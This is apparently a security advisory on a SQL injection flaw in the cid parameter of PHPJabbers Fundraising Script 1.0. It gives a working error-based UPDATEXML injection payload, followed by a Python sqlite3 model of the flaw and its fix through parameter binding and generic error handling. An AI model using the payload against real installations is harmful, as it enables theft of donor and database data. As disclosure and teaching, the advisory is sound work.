29 lines
No EOL
1.1 KiB
Text
## Title: Fundraising Script-1.0 SQLi
## Author: nu11secur1ty
## Date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:

The `cid` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the cid parameter, and a database error
message was returned.
The demo database is empty, but on a populated instance this would put
the donors' money and their bank accounts at risk!
The attacker can steal all information from the database!

[+]Payload:

mysql

Parameter: cid (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT (ELT(1741=1741,1))),0x7162787171),3873))

https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0

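The root cause described above (a campaign id spliced verbatim into the SQL text, with raw database errors echoed back to the client) and its fix can be modelled in a few lines. The following is an added example, not code from the Fundraising Script product or from the advisory author: the real application is PHP on MySQL, while this stand-in uses Python's built-in sqlite3 module with a constructed in-memory `campaigns` table, and the function names (`load_campaign_vulnerable`, `load_campaign_hardened`, `probe`, `handle_request`) are hypothetical. It shows that a lone quote breaks the concatenated query with a database error (the behaviour observed in the advisory), that a boolean tautology widens the result set, and that validating `cid` as a positive integer plus binding it as a parameter, with database errors mapped to a generic response, removes both problems.

```python
import re
import sqlite3

# Constructed sample data standing in for the product's campaign table.
SAMPLE_CAMPAIGNS = [(1, "Clean water"), (2, "School books")]

# Accept only a plain positive integer for a numeric id (no leading zeros, bounded length).
CID_PATTERN = re.compile(r"^[1-9][0-9]{0,9}$")


def make_db():
    """Build an in-memory table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE campaigns (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO campaigns VALUES (?, ?)", SAMPLE_CAMPAIGNS)
    conn.commit()
    return conn


def load_campaign_vulnerable(conn, cid):
    """Models the defect: untrusted `cid` is concatenated into the SQL string."""
    sql = "SELECT id, title FROM campaigns WHERE id = " + cid
    return conn.execute(sql).fetchall()


def load_campaign_hardened(conn, cid):
    """Hardened form: validate the id's shape, then bind it as a parameter."""
    if not isinstance(cid, str) or not CID_PATTERN.match(cid):
        raise ValueError("cid must be a positive integer")
    return conn.execute(
        "SELECT id, title FROM campaigns WHERE id = ?", (int(cid),)
    ).fetchall()


def probe(cid):
    """Run one cid value through both code paths and report the outcome of each.

    Returns a dict mapping 'vulnerable' / 'hardened' to ('ok', rows) or
    ('error', exception class name), so the two behaviours can be compared.
    """
    conn = make_db()
    outcome = {}
    for name, loader in (("vulnerable", load_campaign_vulnerable),
                         ("hardened", load_campaign_hardened)):
        try:
            outcome[name] = ("ok", loader(conn, cid))
        except (sqlite3.Error, ValueError) as exc:
            outcome[name] = ("error", type(exc).__name__)
    return outcome


def handle_request(cid):
    """Hypothetical request handler around the hardened loader.

    Bad input gets a 400 with a fixed message, and any database error is
    logged server-side and answered with a generic 500, so the client never
    sees the engine's error text that an error-based injection relies on.
    """
    conn = make_db()
    try:
        rows = load_campaign_hardened(conn, cid)
    except ValueError:
        return (400, "invalid campaign id")
    except sqlite3.Error as exc:
        print("db error (logged, not returned):", exc)
        return (500, "internal error")
    return (200, rows)


if __name__ == "__main__":
    for value in ("1", "'", "1 OR 1=1"):
        print(repr(value), "->", probe(value))
    print(handle_request("'"), handle_request("2"))
```

The vulnerable path reproduces the advisory's observation: `probe("'")` yields an `OperationalError` from the engine, and `probe("1 OR 1=1")` returns every campaign rather than one. The hardened path rejects both before any SQL is built, and `handle_request` turns that rejection into a fixed 400 body instead of leaking the database's message.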
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>